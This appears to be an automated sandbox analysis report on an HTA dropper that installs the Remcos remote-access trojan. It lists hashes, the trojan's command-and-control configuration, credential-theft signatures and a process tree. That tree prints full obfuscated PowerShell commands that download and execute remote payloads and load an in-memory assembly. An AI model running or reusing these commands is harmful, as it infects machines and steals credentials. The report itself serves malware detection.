Analysis
-
max time kernel
148s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
06-02-2025 10:02
Static task
static1
Behavioral task
behavioral1
Sample
seethebewtthingstodothebestwayofgreatnessgod.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
seethebewtthingstodothebestwayofgreatnessgod.hta
Resource
win10v2004-20250129-en
General
-
Target
seethebewtthingstodothebestwayofgreatnessgod.hta
-
Size
15KB
-
MD5
b17075441c09b68399252230d95973af
-
SHA1
c4951ff30e5c1d76da15be8d097bb9c9b8514235
-
SHA256
23650e26608f6c5c065c8989912b168ec6fba89e759a1a7f3edbe27345e21e4b
-
SHA512
32e325fd879b2c00ede3a2c09348744bfc124b1984640e96ffcaf311b1fd60e63495fd6bf928bfa91cc0216400dedda383891804571667a42314c82efcd7ea9f
-
SSDEEP
48:3PCUlAEW2JlWjEW2wkkjr0AdbSdx399DdNRAAr5yK4/5hyKQlFlUEW28luG:/CU2EJsEhQpKJfrRHr5ylhyXz6E8n
Malware Config
Extracted
remcos
RemoteHost
216.9.226.100:3898
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
true
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
mic
-
mouse_option
false
-
mutex
Rmc-Q9T2QD
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/4060-115-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/2888-113-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/4336-112-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/4336-112-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/2888-113-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 3 IoCs
flow pid Process 19 1228 powershell.exe 28 2988 powershell.exe 29 2988 powershell.exe -
Evasion via Device Credential Deployment 1 IoCs
pid Process 1228 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Control Panel\International\Geo\Nation mshta.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts CasPol.exe -
pid Process 2988 powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2988 set thread context of 2200 2988 powershell.exe 108 PID 2200 set thread context of 2888 2200 CasPol.exe 112 PID 2200 set thread context of 4336 2200 CasPol.exe 113 PID 2200 set thread context of 4060 2200 CasPol.exe 114 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 1228 powershell.exe 1228 powershell.exe 2988 powershell.exe 2988 powershell.exe 2988 powershell.exe 2988 powershell.exe 2988 powershell.exe 2988 powershell.exe 2888 CasPol.exe 2888 CasPol.exe 4060 CasPol.exe 4060 CasPol.exe 2888 CasPol.exe 2888 CasPol.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 2200 CasPol.exe 2200 CasPol.exe 2200 CasPol.exe 2200 CasPol.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1228 powershell.exe Token: SeDebugPrivilege 2988 powershell.exe Token: SeDebugPrivilege 4060 CasPol.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2200 CasPol.exe -
Suspicious use of WriteProcessMemory 49 IoCs
description pid Process procid_target PID 4660 wrote to memory of 348 4660 mshta.exe 86 PID 4660 wrote to memory of 348 4660 mshta.exe 86 PID 4660 wrote to memory of 348 4660 mshta.exe 86 PID 348 wrote to memory of 1228 348 cmd.exe 89 PID 348 wrote to memory of 1228 348 cmd.exe 89 PID 348 wrote to memory of 1228 348 cmd.exe 89 PID 1228 wrote to memory of 3312 1228 powershell.exe 90 PID 1228 wrote to memory of 3312 1228 powershell.exe 90 PID 1228 wrote to memory of 3312 1228 powershell.exe 90 PID 3312 wrote to memory of 4492 3312 csc.exe 91 PID 3312 wrote to memory of 4492 3312 csc.exe 91 PID 3312 wrote to memory of 4492 3312 csc.exe 91 PID 1228 wrote to memory of 2152 1228 powershell.exe 100 PID 1228 wrote to memory of 2152 1228 powershell.exe 100 PID 1228 wrote to memory of 2152 1228 powershell.exe 100 PID 2152 wrote to memory of 2988 2152 WScript.exe 101 PID 2152 wrote to memory of 2988 2152 WScript.exe 101 PID 2152 wrote to memory of 2988 2152 WScript.exe 101 PID 2988 wrote to memory of 4452 2988 powershell.exe 106 PID 2988 wrote to memory of 4452 2988 powershell.exe 106 PID 2988 wrote to memory of 4452 2988 powershell.exe 106 PID 2988 wrote to memory of 4248 2988 powershell.exe 107 PID 2988 wrote to memory of 4248 2988 powershell.exe 107 PID 2988 wrote to memory of 4248 2988 powershell.exe 107 PID 2988 wrote to memory of 2200 2988 powershell.exe 108 PID 2988 wrote to memory of 2200 2988 powershell.exe 108 PID 2988 wrote to memory of 2200 2988 powershell.exe 108 PID 2988 wrote to memory of 2200 2988 powershell.exe 108 PID 2988 wrote to memory of 2200 2988 powershell.exe 108 PID 2988 wrote to memory of 2200 2988 powershell.exe 108 PID 2988 wrote to memory of 2200 2988 powershell.exe 108 PID 2988 wrote to memory of 2200 2988 powershell.exe 108 PID 2988 wrote to memory of 2200 2988 powershell.exe 108 PID 2988 wrote to memory of 2200 2988 powershell.exe 108 PID 2200 wrote to memory of 4000 2200 CasPol.exe 111 PID 2200 wrote to memory of 4000 2200 CasPol.exe 111 PID 2200 wrote to memory of 4000 2200 CasPol.exe 111 PID 2200 wrote to memory of 2888 2200 CasPol.exe 112 PID 2200 wrote to memory of 2888 2200 CasPol.exe 112 PID 2200 wrote to memory of 2888 2200 CasPol.exe 112 PID 2200 wrote to memory of 2888 2200 CasPol.exe 112 PID 2200 wrote to memory of 4336 2200 CasPol.exe 113 PID 2200 wrote to memory of 4336 2200 CasPol.exe 113 PID 2200 wrote to memory of 4336 2200 CasPol.exe 113 PID 2200 wrote to memory of 4336 2200 CasPol.exe 113 PID 2200 wrote to memory of 4060 2200 CasPol.exe 114 PID 2200 wrote to memory of 4060 2200 CasPol.exe 114 PID 2200 wrote to memory of 4060 2200 CasPol.exe 114 PID 2200 wrote to memory of 4060 2200 CasPol.exe 114
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebewtthingstodothebestwayofgreatnessgod.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C pOwErsHell -eX BYPASs -NoP -W 1 -C deViCecreDENtialdEployMeNT.EXE ; IeX($(IEX('[SYStem.texT.eNcoDiNg]'+[char]58+[cHAr]0X3A+'uTF8.geTsTRIng([sYsTEM.COnvERT]'+[CHAr]0X3A+[Char]0x3A+'fromBAse64STring('+[chAR]34+'JG0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYkVSREVmaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFiWmhCY1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUp0LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByUXJMSEwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUNDKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZU1BWm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG06OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMTcuMTYwLjE2My4xMTMvNDUzL3NlZXRoZWJld3R0aGluZ3N0b2RvdGhlYmVzdHdheW9mZ3JlYXRuZXNzZ29kLmdJRiIsIiRlTnY6QVBQREFUQVxzZWV0aGViZXd0dGhpbmdzdG9kb3RoZWJlc3R3YXlvZmdyZWF0bmVzc2dvYmVzdC52YnMiLDAsMCk7c3RhUnQtc2xlZXAoMyk7aU5Wb2tFLWlUZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXHNlZXRoZWJld3R0aGluZ3N0b2RvdGhlYmVzdHdheW9mZ3JlYXRuZXNzZ29iZXN0LnZicyI='+[char]0X22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:348 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepOwErsHell -eX BYPASs -NoP -W 1 -C deViCecreDENtialdEployMeNT.EXE ; IeX($(IEX('[SYStem.texT.eNcoDiNg]'+[char]58+[cHAr]0X3A+'uTF8.geTsTRIng([sYsTEM.COnvERT]'+[CHAr]0X3A+[Char]0x3A+'fromBAse64STring('+[chAR]34+'JG0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYkVSREVmaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFiWmhCY1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUp0LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByUXJMSEwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUNDKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZU1BWm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG06OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMTcuMTYwLjE2My4xMTMvNDUzL3NlZXRoZWJld3R0aGluZ3N0b2RvdGhlYmVzdHdheW9mZ3JlYXRuZXNzZ29kLmdJRiIsIiRlTnY6QVBQREFUQVxzZWV0aGViZXd0dGhpbmdzdG9kb3RoZWJlc3R3YXlvZmdyZWF0bmVzc2dvYmVzdC52YnMiLDAsMCk7c3RhUnQtc2xlZXAoMyk7aU5Wb2tFLWlUZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXHNlZXRoZWJld3R0aGluZ3N0b2RvdGhlYmVzdHdheW9mZ3JlYXRuZXNzZ29iZXN0LnZicyI='+[char]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\srkqeh2r\srkqeh2r.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3312 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD292.tmp" "c:\Users\Admin\AppData\Local\Temp\srkqeh2r\CSC1E474D0BFCE94D4BA095FC9C3A509030.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:4492
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebewtthingstodothebestwayofgreatnessgobest.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZABvAGcAcwBzAGUAbgB0AGEAZQByAGcAZgBvAHkAYQB3AHQAcwBlAGIAZQBoAHQAbwBkAG8AdABzAGcAbgBpAGgAdAB0AHcAZQBiAGUAaAB0AGUAZQBzAC8AMwA1ADQALwAzADEAMQAuADMANgAxAC4AMAA2ADEALgA3ADEAMgAvAC8AOgBwAHQAdABoACcAOwAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACAAPQAgACQAbwByAGkAZwBpAG4AYQBsAFQAZQB4AHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGkAbQBhAGcAZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAZwBvAGgAdQA3AHMAbAB4AC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADgAOAAwADYANgA5ADMALwBsADgAbABtAG8AMgA2AG8ANwByAGYAOABvAHkAZwByADEAMAB5ADkALgBqAHAAZwAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAG0AYQBpAG4AJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAZgBhAGwAcwBlACcALAAnAEMAYQBzAFAAbwBsACcALAAnAGYAYQBsAHMAZQAnACkAKQA=')) | Invoke-Expression"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵PID:4452
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵PID:4248
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\riijeutjsfcogekxv"7⤵PID:4000
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\riijeutjsfcogekxv"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2888
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tcvufnekooutjkybmyxe"7⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:4336
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\dfamgfxecwmytyunwjsggrd"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4060
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
102B
MD5db8285d3783e724320bd468c145b7f7c
SHA108d8f61ff58c40312977fc3fb4248b39efa43eaf
SHA2560e2b0323ea24bd278a1aa44b63db0f5b72d04acdc778d837cabf1a30ebe9cf42
SHA5127ca9961e2ce591a7289861deb20a067ec63433101691f6665c1811317308f9be3b92b3de708c1bf86bebe0a04bc3c174988176d4e10f68d6a743dc9ff646d311
-
Filesize
2KB
MD59faf6f9cd1992cdebfd8e34b48ea9330
SHA1ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e
SHA2560c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953
SHA51205b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97
-
Filesize
19KB
MD54c86e96e7d8b128e634a9cd24820bed1
SHA115910e7b9db5fd981b7120ce70fe03363e8783d1
SHA256d85e84dc8ba31ab88dec5344de25e8bd198a89e296f8fb040706a19f03391eb4
SHA5123a09948dc9d35f6af49615dcc5cb2bf98fb2f53504b28ae10cfc6606337b807c7c02e7c51374742d995ab08318a70e2717cbd10dd3c1774f2322a0000dab84c0
-
Filesize
1KB
MD52db1f87692dda380e505e9d2b6e507af
SHA1de14667cc49d781626e9d6634c0f8036be475d00
SHA256b178e26c7a788562c7a9e2245056982c1ce28b0590c26f01d07cbd5919ce8eab
SHA512b1d46bcce686380ed2f920c862b6674794404cb221fff1c536c30b612fa21aef489f263fc338a7cf94cd224e16e78e1e943831651cd36250395898e453d89fe2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD50e98efb5de87ad56d65832c99afbaa33
SHA1467d68f10d14e92372197913f3d8a0277c5ecb44
SHA2560e10bed8e4c5b10bb0b407f0394452fad6f6914489981e8ffde4855ad90dd59e
SHA5125a7ca92c47dfaeab43250b0756ee52cc601ed166305c345ffac9820af9a3aa7110f5262e9bbcfb8d8c48eb7381f5af60ba7f756da3c546e6a3cd20a22c32dd5f
-
Filesize
3KB
MD5cc64d641da86a4da83358d9a8c1a5ef9
SHA18181217324b00096d51d6324b00d952c16ceda5a
SHA256ee83324dd4a5b390f24a39b5a4da7b3d2171a0dd480eda08bc960d52aba1fbf2
SHA512342f34ea6635002c8a0ca22ca8260916436a8bd4c3e15b0edd51d2373d8d6a338fa15e1997bf143d504d05b1ae515e72281019467a238366e54b3561dd7274ff
-
Filesize
184KB
MD58cbb8e8c083138f50289f5722b80d0ec
SHA12e9d338f32146e76db9172c61cd95015de939983
SHA256e574c7c03391b4142af0cfc89a23dc50eeb0573ec4922c6e3b3a032d0cd7a19e
SHA512edb5c025fa91149cd6ac1364833eb46be5fb03fe0f586d24df00973e90a601b5499d97e47a6f8f618f1b1110721cc6ef81463fbae8021ce3309c1554966fabb5
-
Filesize
652B
MD58eb77e9e06da9b135a776d785ac5177b
SHA1fc092291fda34392a559488967022d2f82f35bd9
SHA256bd4c05eb5e396a862c2ebf4dc4379e79e3a8a3f458388f24a3eaa258df653cf6
SHA51277ea6d1478f0842c35fd060a6e2a82a720d44b5120bce9d46b044db275b9b3661ea0740c5153c71b0f70bf7f61afc04f8e205165f82331d17c74d9c8fbfdd710
-
Filesize
459B
MD519403550f9bf1d9942a15391df03e6f0
SHA126306f174cd81bce51d8fc318693f4268f571fa4
SHA2563d6d5d032a8c6d8e0bd23e514117ff1a62e24724dd1e93bbe29ead9a58d33fef
SHA512851893286fc42013dde0507ead8775103eda3af5b7b8e82be156be063359f9ee2bfb660b482d608095871b74c4b960b98e24761ab52ba147158d8fd74c271b3a
-
Filesize
369B
MD5c812071a377962c644886a0e007ca2a4
SHA1bac2ae9ef7c228f5890efe45dc98f118cbf4245d
SHA256017972864ef0df390372a0b92ac36e8a4fa9eaf7131cba43db74d728b8642e22
SHA5125a85e2f4de8bbc0f0b8797ac40b33f6e83686762b4ac0a58646e60627eea4bc71730a62f948606a3769af08fca89f463a570cd9c8279b36c662b2a67841dcf67